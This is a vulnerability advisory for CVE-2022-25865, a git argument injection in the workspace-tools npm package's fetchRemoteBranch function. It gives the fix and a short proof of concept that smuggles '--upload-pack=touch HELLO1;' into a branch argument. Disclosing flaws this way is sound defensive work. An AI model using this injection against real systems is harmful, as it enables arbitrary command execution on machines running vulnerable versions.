Command Injection Affecting workspace-tools package, versions <0.18.4
Threat Intelligence
Exploit Maturity
Proof of concept
EPSS
0.21% (60th percentile)
- Snyk ID SNYK-JS-WORKSPACETOOLS-2421201
- published 11 May 2022
- disclosed 11 Mar 2022
- credit Alessio Della Libera of Snyk Research Team
Introduced: 11 Mar 2022
CVE-2022-25865
How to fix?
Upgrade workspace-tools to version 0.18.4 or higher.
Overview
workspace-tools is a JavaScript package of monorepo workspace tools.
Affected versions of this package are vulnerable to Command Injection via git argument injection. When calling the fetchRemoteBranch(remote: string, remoteBranch: string, cwd: string) function, both the remote and remoteBranch parameters are passed as positional arguments to the git fetch subcommand in a way that lets a caller-supplied value be interpreted as an additional git flag. Such a flag (for example one that names a program for git to execute) can be used to perform a command injection.
PoC
```javascript
const workspace_tools = require("workspace-tools");
workspace_tools.init("./", "username", "password"); // or git init
let remote1 = "origin";
let remoteBranch1 = "--upload-pack=touch HELLO1;";
workspace_tools.fetchRemoteBranch(remote1, remoteBranch1, "./"); // git [ 'fetch', 'origin', '--upload-pack=touch HELLO1;' ]
// let remote2 = "--upload-pack=touch HELLO2;";
// let remoteBranch2 = "foo";
// workspace_tools.fetchRemoteBranch(remote2, remoteBranch2, "./"); // git [ 'fetch', '--upload-pack=touch HELLO2;', 'foo' ]
```
CVSS Scores (version 3.1)